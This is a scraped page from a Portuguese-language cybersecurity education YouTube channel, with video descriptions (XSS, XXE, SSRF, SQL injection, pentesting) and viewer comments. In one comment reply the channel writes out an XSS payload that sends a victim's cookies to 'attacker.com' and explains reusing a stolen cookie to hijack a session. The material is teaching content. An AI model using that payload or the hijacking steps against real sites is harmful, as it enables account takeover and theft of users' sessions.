- Видео 108
- Просмотров 153 746
Kraken Academy
Бразилия
Добавлен 17 янв 2023
🌐 Bem-vindos à Kraken Academy! Seja parte de nossa comunidade Purple Team, onde desvendamos a cibersegurança de forma acessível e envolvente. Aprenda com cursos interativos, vídeos de Red Team e Blue Team, e mergulhe em podcasts inspiradores com especialistas. Nossa equipe traz expertise comprovada, incluindo instrutores treinados, recordistas na guerra cibernética e possuidores de diversas certificações na área. Não importa sua idade, apenas sua paixão por aprender. Cabe ressaltar também que as técnicas ensinadas são todas realizadas em ambiente controlado e são ensinadas para fins educacionais e para contribuição de novos profissionais na área. Aconselhamos veementemente a não replicar as técnicas ensinadas sem antes possuir o domínio completo do que está sendo feito, ciente das responsabilidades advindas de suas utilizações. Junte-se a nós e libere o Kraken da cibersegurança! 🚀🔒 #KrakenAcademy #cibersegurança #purpleteam
Aprendendo Python com Pong: Crie seu Primeiro Jogo!
Neste primeiro vídeo da nossa playlist, vamos explorar o desenvolvimento do clássico jogo Pong utilizando Python! Este projeto é uma excelente forma de aprender conceitos básicos de programação enquanto se diverte criando um jogo.
É importante destacar que o script que usaremos não é de minha total autoria; estou utilizando um código já existente como meio de ensino. Vamos analisar e entender cada parte do código juntos, para que você possa aprender e aplicar esses conceitos em seus próprios projetos. Prepare-se para codar e se divertir!
Não se esqueça de se inscrever no canal e ativar as notificações para não perder os próximos episódios!
Links:
www.linkedin.com/in/achilisguimaraes/
www.linke...
É importante destacar que o script que usaremos não é de minha total autoria; estou utilizando um código já existente como meio de ensino. Vamos analisar e entender cada parte do código juntos, para que você possa aprender e aplicar esses conceitos em seus próprios projetos. Prepare-se para codar e se divertir!
Não se esqueça de se inscrever no canal e ativar as notificações para não perder os próximos episódios!
Links:
www.linkedin.com/in/achilisguimaraes/
www.linke...
Просмотров: 42
Видео
Criando um Scanner de Portas em PYTHON!
Просмотров 93День назад
Neste vídeo, vamos ensinar como desenvolver um port scanner utilizando Python, uma ferramenta essencial para qualquer profissional de segurança cibernética. Você aprenderá o que é um port scanner, como ele funciona e como pode ser usado para identificar vulnerabilidades em redes. Exploraremos o código passo a passo, abordando conceitos fundamentais de programação e redes. O que você vai aprende...
O perigo oculto das transferências de zona - O que você PRECISA saber?
Просмотров 8614 дней назад
Neste vídeo(O perigo oculto das transferências de zona - O que você PRECISA saber?), vamos explorar os perigos associados à transferência de zona DNS, uma vulnerabilidade que pode expor informações críticas sobre a infraestrutura de uma rede. Vamos explicar o que é a transferência de zona, como ela pode ser explorada por invasores e as implicações de segurança para administradores de sistemas. ...
Proton VPN: Proteja Seus Dados utilizando VPN
Просмотров 12021 день назад
Acesse Serviços e Sites com Proton VPN de Forma Anônima e Segura No vídeo de hoje, vou te mostrar como utilizar o Proton VPN, uma ferramenta poderosa para navegar pela internet de forma anônima e segura. Com o Proton VPN, você consegue acessar serviços, enquanto mantém sua privacidade protegida. Neste tutorial passo a passo, vamos configurar o Proton VPN juntos, garantindo que você consiga mant...
Command Injection - Qual limite de um ataque?
Просмотров 202Месяц назад
Neste vídeo (Command Injection - Qual limite de um ataque?), abordaremos os riscos devastadores de uma vulnerabilidade de Command Injection e como os hackers podem explorá-la para obter controle total sobre um sistema. Explicaremos o que é Command Injection, suas consequências e por que é crucial proteger sua aplicação contra esse tipo de ataque. Preferimos evitar a exibição direta de certos at...
Evite o Roubo de Dados - Aprenda a Prevenir Ataques XSS!
Просмотров 180Месяц назад
Neste vídeo ("Evite o Roubo de Dados - Aprenda a Prevenir Ataques XSS!"), abordaremos os perigos de clicar em links suspeitos e como eles podem ser usados para explorar vulnerabilidades como o Cross-Site Scripting (XSS). Explicaremos o que é XSS, suas consequências e por que você deve estar sempre atento ao navegar na web. Não houve a demonstração de um payload de roubo de sessão por questões d...
Descubra como XXE se Transforma em SSRF: Explorando Entidades XML
Просмотров 131Месяц назад
Neste vídeo("Descubra como XXE se Transforma em SSRF: Explorando Entidades XML"), daremos continuidade ao nosso estudo sobre XML e Entidades Externas. Vamos explorar a vulnerabilidade XML External Entity (XXE) e demonstrar como ela pode ser utilizada para realizar um ataque Server-Side Request Forgery (SSRF). Link do laboratório: portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ss...
Tipos de Pentest que Você Precisa Conhecer!
Просмотров 90Месяц назад
🌐 Tipos de Pentest que Você Precisa Conhecer! 🔍 Você sabe quais são os diferentes tipos de testes de penetração e como cada um pode ajudar a proteger seus sistemas? No vídeo de hoje, vamos explorar os principais tipos de pentest que você precisa conhecer para garantir a segurança da sua rede e aplicações! 🔹 Pentest de Rede : Descubra como identificar vulnerabilidades em sua infraestrutura de re...
Pentest - Introdução e Aspectos Importantes da Enumeração!
Просмотров 1032 месяца назад
Neste vídeo (Pentest - Introdução e Aspectos Importantes da Enumeração!) Vamos abordar alguns topicos importantes da fase de Enumeração de um Pentest! Baixe grátis nosso eBook sobre pentest: www.krakenacademy.com.br/ebook Se você gostou desse conteúdo dê uma olhada em nosso curso de introdução ao Pentest no link abaixo: www.krakenacademy.com.br/introaopentest 🗺️ Nossos Destinos: linktr.ee/krake...
APT: Entenda as Ameaças Persistentes Avançadas e Como se Proteger!
Просмотров 1172 месяца назад
Neste vídeo, exploramos o conceito de Ameaças Persistentes Avançadas (APT), como elas funcionam e as principais estratégias para proteger sua empresa contra esses ataques cibernéticos sofisticados. Entenda os riscos e aprenda a fortalecer a segurança da sua rede. Assista ao nosso vídeo sobre o Stuxnet, entenda seu funcionamento e como ele afetou as centrífugas nucleares: ruclips.net/video/ehSlE...
XML External Entity - Como funciona um ataque de XXE
Просмотров 1182 месяца назад
Neste vídeo(XML External Entity - Como funciona um ataque de XXE) Vamos abordar pela primeira vez a vulnerabilidade de XML External Entity mais conhecida como XXE. Sendo uma vulnerabilidade pouco mencionada em cursos introdutórios, neste primeiro vídeo focamos em abordar a linguagem XML e dar uma noção sobre o funcionamento da vulnerabilidade de XXE. Links mencionados no vídeo: www.linkedin.com...
SQL injection - Guia completo
Просмотров 3592 месяца назад
Neste vídeo(SQL injection - Um guia completo) Vamos colocar em prática mais uma vez a vulnerabilidade de SQL injection. Abordaremos de uma nova ótica, tentando trazer mais conhecimento teórico para os nossos alunos. Deixarei aqui todos os links relacionados ao vídeo, deixe seu like e se inscreva para ajudar a gente. Bons estudos! Links mencionados no vídeo: tryhackme.com/r/room/sqlinjectionlm p...
CROWDSTRIKE: Ataque Hacker ou Falha Técnica, o que gerou o Apagão Cibernético?
Просмотров 762 месяца назад
Neste vídeo (CROWDSTRIKE: Ataque Hacker ou Falha Técnica, o que gerou o Apagão Cibernético?) Vamos analisar o Apagão Cibernético mundial e seus impactos! Se você gostou desse conteúdo dê uma olhada em nosso curso de introdução ao Pentest no link abaixo: www.krakenacademy.com.br/introaopentest 🗺️ Nossos Destinos: linktr.ee/krakenacademy Cursos Online de Segurança Cibernética: Navegue pelo nosso ...
Server Side Request Fogery(SSRF) - Forjando requisições
Просмотров 1803 месяца назад
Neste vídeo(Server Side Request Fogery(SSRF) - Forjando requisições) Vamos colocar em prática um conteúdo ainda não abordado aqui no canal. Inicialmente explicaremos o que é e como funciona um SSRF em um lab do tryhackme e, logo após, iremos colocar em prática explorando a vulnerabilidade em uma laboratório da portswigger. Links mencionados no vídeo: tryhackme.com/r/room/ssrfhr - TryHackMe port...
Vulnerabilidade Crítica OpenSSH - 2024!
Просмотров 1683 месяца назад
Neste vídeo (Vulnerabilidade Crítica OpenSSH - 2024!) Vamos abordar uma vulnerabilidade descoberta em Julho deste ano, que permite executar comandos remotamente em seu server, caso você possua as versões afetadas do OpenSSH! Fontes utilizadas: hostmf.com.br/central/announcements/26/Proteja-Seu-Servidor-Vulnerabilidade-Critica-no-OpenSSH-CVE-2024-6387.html medium.com/@souzaw/threat-hunting-cve-2...
Tryhackme - Brute It: Hydra, Burp, john [PT-BR]
Просмотров 2953 месяца назад
Tryhackme - Brute It: Hydra, Burp, john [PT-BR]
Linux para Pentesters: Gestão de usuários e permissões!
Просмотров 1373 месяца назад
Linux para Pentesters: Gestão de usuários e permissões!
Escalação de privilégios - Library Hijacking
Просмотров 2594 месяца назад
Escalação de privilégios - Library Hijacking
O que você precisa saber sobre: Fundamentos da Segurança da Informação!
Просмотров 1724 месяца назад
O que você precisa saber sobre: Fundamentos da Segurança da Informação!
Nmap, netcat, enum4linux - Automatizando o ataque!
Просмотров 5095 месяцев назад
Nmap, netcat, enum4linux - Automatizando o ataque!
Podcast 008 - Porque reprovei na certificação CompTIA!
Просмотров 1405 месяцев назад
Podcast 008 - Porque reprovei na certificação CompTIA!
Seja nosso parceiro - Faça parte da iniciativa KRAKEN!
Просмотров 1365 месяцев назад
Seja nosso parceiro - Faça parte da iniciativa KRAKEN!
Python - Listas, Tuplas, Dicionários, Set
Просмотров 716 месяцев назад
Python - Listas, Tuplas, Dicionários, Set
Mini-Curso Pentest: Aula 06 - Enumeração
Просмотров 2307 месяцев назад
Mini-Curso Pentest: Aula 06 - Enumeração
Ta amis o hudra ta oegando a senha do q do insta do tiktok eu n entendi isso
amigo sabe se da para usar o hydra no adminer?
Bom dia, amigo! Não conheço a plataforma, sinto muito não poder ajudar. Qualquer outra dúvida estamos a disposição!
Qual a vantagem do kali no pen-drive?
na minha opinião tem a vantagem de ser um pouco mais privado para você
Opa tem várias, mas segurança, por estar isolado, anonimização também, portabilidade, poder utilizar em computadores diferentes a partir do seu pen drive.
É melhor e mais seguro rodar o kali em um pendrive ou em uma máquina virtual?
Falando de forma bem resumida, as duas maneiras são boas para serem utilizadas, depende do nível de segurança que você deseja e também do desempenho. Em um pen drive você fica limitado a velicidade da USB para acessar o SO, também tem a questão de segurança do pen drive no caso de perder, perde-se tudo. Porem como vantagem você poder fazer uma instalação persistente e ir atualizando o SO, intalando aplicativos, você também consegue acesso ao hardware fisico da maquina em que estiver usando o pen drive, e ganha com portabilidade, por poder utilizar em maquinas diferentes. Já na VM, você consegue escalar o hardware pra ela e consegue um desempenho melhor, claro que depende do seu hardware hospedeiro. O uso de Backup e snapshot na VM também é uma vantagem. Você consegue isolar a VM dentro do hospedeiro, pode ser utilizado até uma cadeia de anonimização com mais de uma VM. Possui menos portabilidade comparado ao pen drive, no caso de trabalhar com pentest, o interessante é ter uma VM pronta no seu computador e também ter um pen drive preparado com seu arsenal.
Top
Obrigado!
Essa parte do "iff __name__ == '__main__':" me deixou em dúvida. Se puder, passa uma explicação desse trecho
Opa, vamos lá. Essa condicional é comum em Python para verificar se o script está sendo executado como programa principal ou se está sendo importado como um módulo em outro script. Isso é interessante porque, ao importar um módulo, o Python executa o código do módulo inteiro. No entanto, como a condição do if não será verdadeira ao importar, isso evita a execução de código desnecessário ou de testes, evitando erros na tela. Dessa forma, facilita a reutilização de códigos, permitindo que a função port_scan (ou qualquer outra) possa ser utilizada em outro script sem problemas. Vou trazer um exemplo disso no próximo vídeo.
Agora sim!
Bora pra cima!
Ele aparece so quando eu boto o pendrive ou ele ja fica ai quando eu tirar o pendrive
Boa noite, se voce instalar no pen drive vai ficar funcionando somente com o pen drive conectado, se você quiser pode formatar e instalar o Kali no seu HD.
Excelente , vi no LinkedIn e já vou maratonar.
Agradecemos pela moral, qualquer dúvida estamos a disposição!!
Po tem como fazer isso com o insta ?
Opa, não há essa possibilidade! O insta, assim como sites mais populares possuem proteção contra ataques de brute-force.
Infelizmente meu pc pegou vírus, não sei mais o que faço
Bom dia, primeiramente, pare de usar ele, procure alguém para fazer uma formatação segura do seu sistema operacional e reinstale todos os seus programas; Isso vai garantir sua segurança.
@@KrakenAcademy então apenas a formatação já resolve? O bom é que eu tenho backup dos arquivos comigo em mídia física. Depois de formatar, preciso também trocar todas as senhas de contas que tinham nele?
Tudo que eu fazer no pendraive fica salvo nele ?? como eu faria para dar boot pelo samsumg ??
Opa bom dia, se você instalar o sistema operacional no pen drive, ou criar um disco de boot de forma persistente, o que for feito no pen drive ficara salvo. Para selecionar por onde sera feito o boot você pode apertar a tecla F8 na inicialização (geralmente é essa tecla) para selecionar de onde será carregado o SO, ou então entrar nas configurações e alterar a ordem de boot entre os discos, pen drive ou HD por exemplo.
Parabéns pelo vídeo brother, aquela hora não apareceu no gobuster o login.php, porque estava sem o parametro -x php, ficaria assim gobuster dir -u 10.10.49.82 -w /wordlist/ -x php. Descobri recentemente kkkkk
irmão vc é monstro, me salvou muito na minha pesquisa, jamais desista disso, vc tem muito talento
Agradeço pelo comentário e fico muito feliz que tenha conseguido ajudar. Qualquer dúvida, estamos a disposição!!
Excelente!!!
Gratidão! Continue nos acompanhando!
As vezes a gente não entende algo pela falta de didática. Aqui não é o caso, entendi por completo. Parabéns e obrigado pelo conteúdo!!
Muito obrigado pela participação e pelo comentário, nobre amigo! Sucesso!!
Didática excelente 👏🏼
Muito obrigado pela moral, meu doutor!!
Brabo!
Obrigado!
Como sempre, conteúdo brabíssimo!
Como sempre dando aquela moral pra gente, muito obrigado meu amigo!!
Muito obrigado queria uma ajuda em call para eu itender direito rsrs mas e isso
Opa, acessa o nosso discord. Quando possível dê um alô por lá que a gente tenta ajudar!
@@KrakenAcademy, onde está u serv discord não estou vendo
@@ghost-xc3wv Bom dia, meu amigo! O servidor encontra-se neste link: discord.com/invite/48cFP8s7eC
Cara tope com essa voz de locutor parabéns qual seu curso
Obrigado pelo elogio. Temos um curso de introdução ao pentest, podes dar uma olhadinha no link a seguir, também temos um ebook e muito conteúdo gratis aqui no canal. www.krakenacademy.com.br/introaopentest
Aparece a mensagem security bot fail, oq fazer?
Olá bom dia! Obrigado por acompanhar nosso canal. Geralmente está relacionada ao recurso de Secure Boot do UEFI, que é uma tecnologia de segurança projetada para garantir que somente software confiável seja executado durante o processo de inicialização do sistema. Desativar o Secure Boot 1º) Acesse a BIOS/UEFI: Ao iniciar seu computador, pressione a tecla apropriada para entrar na BIOS/UEFI. As teclas mais comuns são F2, F10, F12, Esc ou Del, mas isso pode variar dependendo do fabricante do seu computador. 2º) Localize as configurações de Secure Boot: Navegue pelas configurações até encontrar a seção de Secure Boot. Isso pode estar em uma aba como Boot, Security, ou Authentication. 3º) Desative o Secure Boot: Mude a configuração de Secure Boot para Disabled. 4º) Salve as alterações e saia: Normalmente, você pode salvar e sair pressionando F10 e selecionando "Yes" para confirmar.
E após coletar o cookie da pessoa, como eu acessaria o serviço utilizando o mesmo?
Dependendo da aplicação, você poderia trocar de sessão com um usuário logado, ou interceptar a tentativa de login com uma conta aleatória e inserir o cookie no corpo da requisição.
Que nível!
Obrigado
Mas nesse caso foi um refletido apenas, não fez o armazenamento de cookies, como faria o hijacking? Para fazer a coleta dos cookies não deveria subir a servidor em python, redirecionar o tráfego com <script>alert(document.cookie)</script> e assim que bater no redirecionamento o alvo automaticamente faz uma requisição para o seu servidor com os cookies dele, depois você poderia mudar e acessar a página com o login e senha do usuário? Não estou fazendo o comentário para brigar kkkk só perguntando mesmo 😂😂
Exato, dando uma olhada na descrição escrevemos o porquê de não ter demonstrado neste vídeo o roubo de cookies. A intenção foi somente gerar um alerta com relação aos links de desconhecidos. Tivemos alguns strikes com certos vídeos, pois o youtube nem sempre interpreta o assunto passado como "aula". Em breve, descobrindo como postar este tipo de conteúdo sem maiores consequências ao canal, faremos da forma convencional. Obrigado pelo comentário!
O exemplo passado verbalmente com mensagem, servidor e roubo cookie seria mais ou menos assim: site.com/search?q=<script>alert('Você foi hackeado!');document.location='attacker.com?cookie='+document.cookie</script>
Lembrando que o servidor precisa estar atrelado com algum serviço que o exponha para a redes externas a sua, como o ngrok, por exemplo.
@@KrakenAcademy Top! Exatamente!
Na próxima lança um de storage XSS primo
Aoba, já estamos preparando!!
Gostei muito do vídeo. Excelente explicação. Parabéns
Obrigado por acompanhar nosso canal, permanecemos a disposição se tiver algum conteúdo de interessa, pode deixar nos comentários. Bons estudos.
Como eu faço para criar uma word list?
Boa tarde!! Temos um vídeo aqui no nosso canal ensinando: ruclips.net/video/INHjam8lN6M/видео.htmlfeature=shared
olá, quando vou iniciar o kali, aparece o drgãozinho mas ele não carrega, a luz azul sobe até metade do dragão e depois de um minuto o pc reinicia sozinho e cai novamente na parte de opções de inicialização do kali, ja fiz este processo de instalação no pen drive algumas vezes mas até agora sempre o mesmo problema. Saberia como me ajudar?
Olá boa noite, primeiramente obrigado por nos acompanhar, vou deixar algumas sugestões para tentar solucionar: Esse problema pode estar relacionado a uma falha na instalação do Kali Linux ou a um problema com o hardware ou configuração do seu sistema. Aqui estão algumas sugestões que podem ajudar a resolver o problema: 1. Verifique a Integridade do Pendrive e ISO - Reinstale a ISO: Pode ser que a imagem ISO esteja corrompida. Baixe novamente o Kali Linux no site oficial e crie um pendrive de boot usando uma ferramenta confiável, como o [Rufus](rufus.ie/pt/). - Verifique a ISO: Após o download, verifique o checksum (MD5 ou SHA256) para garantir que a imagem não esteja corrompida. 2. Testar com Outro Pendrive - Se o pendrive estiver com defeito, ele pode causar falhas durante o processo de instalação. Tente usar outro pendrive. 3. Alterar Configurações da BIOS/UEFI - Modo UEFI/Legacy: Tente alternar entre UEFI e Legacy no BIOS. Alguns sistemas funcionam melhor com uma dessas opções. - Desabilitar Secure Boot: O Secure Boot pode causar problemas com algumas distribuições Linux. Verifique se ele está desabilitado. Se nenhuma dessas opções resolver o problema, me avise, e posso te ajudar a investigar mais a fundo.
@@KrakenAcademy certo, muito obrigado!
Ótima explicação e ótimo vídeo! Obrigado...
Nós que agradecemos! Continue nos acompanhando. Atenciosamente.
@@KrakenAcademy O Kali Linux resolveu um simples copiar e colar que o windows não conseguiu. 😍
tenho wordlist da internet mais nao sei como usa
O que você gostaria de fazer com ela? Uma sugestão seria realizar testes de força bruta, temos um vídeo aqui no canal. Dê uma olhada nas nossas playlists, tem bastante coisa legal!
nao endendi ainda
O que você não entendeu, amigo? Se conseguir especificar, podemos tentar ajudar!
Achei ótimo !
Obrigado!
Excelente!
Obrigado 😃
1-Dizer q a marca da Pen é relativa está errado. Tanto a marca como a velocidade de escrita e leitura (read and written) são fundamentais. No minimo 80 megas/segundo. Consultem os valores na embalagem da Pen. 2-Usando o Rufus a persistencia será sempre relativa. Para persistencia total devemos instalar o Kali na Pen, criar a partiçao "persistence" e montá-la (consulte o website do Kali). Mas para quem não sabe fazer isto, pode usar a ferramenta mkusb em vez do Rufus. É uma ferramenta q tb permite persistencia total. É tb a ferramenta preferida dos programadores do Parrot Security, um sistema de Pentest q considero superior ao Kali. Dúvidas???
Obrigado por nos acompanhar! Atenciosamente! S2
Qual a diferença entre baixar o SO normal e com persistencia?
@@vincemixer Ora bem,vamos lá ver se consigo responder de forma a que todos entendam. Com persidtência tudo o que fizermos persiste, será guardado permanentemente. Sem persistência tudo o que fizermos (ficheiros, atualizações, softwares novos, etc...) será perdido assim que desligarmos o computador! Para quem não sabe usar um sistema como o Kali recomendo o modo Live que significa sem persistência. Assim se estragarmos o sistema por mau uso, basta desligar o computador e esse sistema volta à origem.
Show de bola! uma continuação do vídeo anterior sobre XML e entidades externas. Ele aborda a parte prática do assunto, enquanto o vídeo anterior abordou a parte teórica.
Sucesso!
Existe como saber o IP de um número de celular ( digitou o número é aparece o ip)
Opa boa tarde amigo, primeiro deve se levar em conta qual a conexão de dados do celular, se for wi-fi, ele recebera um IP privado de um roteador. Você podeverifica qual o seu IP prividao indo nas configurações de Wi-Fi do seu aparelho. Caso esteja conectado a uma rede de dados 5G ou 4G o aparelho recebera um IP publico da operadora, para saber seu IP publico pode consultar alguns sites na internet, como qual meu IP. Espero ter ajudado. Atenciosamente.
opa mn vamos supor estou num site de escola e quero acessar a conta de um professor mas não sei nenuma informação sobre daria pra descobrir? se sim como?
Bom dia, nobre! Sobre a sua pergunta, primeiramente aconselhamos a não fazer nada errado. A respeito da pergunta, particularmente falando sobre a ferramenta hydra... Seria possível realizar testes com ela, dependendo apenas do tipo de resposta que a aplicação tem ao interagir.
@@KrakenAcademy muito obrigado por me responder, eu não irei fazer nada de errado ksksks era apenas um exemplo.
@@KkkkKkkk-hy8bk Precisando de ajuda com os estudos estamos a disposição!
Nunca vi um canal com tanta qualidade, continue assim amigo
Obrigado pelo elogio, continue nos acompanhando. Atenciosamente.
Vou tentar fazer em um HD externo
Opa legal, poste aqui o resultado. Atenciosamente.
No filtro de cidade teve um erro de syntax, você esqueceu de colocar o ":" após o nome city:"Sao Paulo" por isso não retornou resultado.
Opa bom dia, muito obrigado, iremos corrigir para o próximo vídeo. Atenciosamente.
👏👏👏👏👏
Obrigado! Continue nos acompanhando!
Quando eu desligar o computador e tira o pendrive, o próximo que liga o computador volta ao normal?
Bom dia, tudo bem? Sim se você executar o boot a partir do pen drive, tirando o pen drive e reiniciando o PC, vai carregar o sistema operacional que esta no HD da máquina. Iniciará normal.
nno meu caso nnao deu certo, diz algo como que tem que "load kennel" ... algo assim
Bom dia, parece que não esta carregando o kernel do linux, você pode tentar fazer de novo, com outro pendrive ou outro aplicativo para criar o disco de boot, pode usar o balena ou rufus, tem também o yumi. Pode tentar outra versão do kali também. Mande aqui o erro que der que estamos a disposição.
Fiz tudo so nao consegui da bot como faco meu pc e o 3gren tecnoly
Boa tarde, tudo bem? Você instalou o sistema no seu HD fisico do seu PC? Ou só baixou e jogou o kali em um pendrive?
@@KrakenAcademybaixei e joguei no pen drive
@@KrakenAcademytem como vc passar seu Instagram pra depois eu te perguntar algumas coisas pra min aprender usar mais o kali linux
Apertei o f12 reniciei e tirei o pen dirve maos nao abriu o kali uq faço????
Boa tarde, tudo bem? Você instalou o sistema no seu HD fisico do seu PC? Ou só baixou e jogou o kali em um pendrive?
@@KrakenAcademy Baixei e colocquei no pen dive e depois reiniciei e tentei abri o boot mais não consegui temtei varias teclas mais nao foi ? Te como vc me ajudar
Pra quem quer se divertir como uma criança sem retorno nenhum ta bom demais
Obrigado por acompanhar nosso canal! Atenciosamente.
excelente didática!
Muito obrigado pelo comentário, motiva bastante a gente!
Em meu aparelho celular anterior, instalei um aplicativo não licenciado, que permaneceu em meu dispositivo por aproximadamente dois anos. Recentemente, descobri que esse aplicativo estava consumindo uma quantidade excessiva de dados Wi-Fi, o que me leva a crer que ele pode ter comprometido a segurança do meu aparelho e coletado informações pessoais sem o meu consentimento, gravado a minha rotina por dois anos, olha que merda. Foi naquele Happy Mod, enfim, meu brilho sumiu, só quero sumir do mundo agora
Poisé esse é o perigo de app não licenciados, ou crackeados. Nunca sabemos o que esta rodando em background, mas um bom indicador foi o que você fez, analise do trafego de dados.
uma observação quando vocês forem colocar alguma propaganda não coloca no meio do video isso atrapalha quem esta assistindo fazendo perde a concentração e perdendo o interesse no video
Bom dia, a questão da propaganda é complicado, pois se é colocado no inicio o pessoal sai do vídeo, no meio interrompe e no final ninguém vê. É uma situação complicada, mas vamos buscar alocar de uma melhor forma. Obrigado pela observação!
@@KrakenAcademy e voce acha que no meio a pessoa não sai ? pessima escolha eu mesmo deixe de ver o resto do video e fui ve outra coidsa mais interessante sem propaganda no meio disperçando a minha atenção ....
Bons estudos!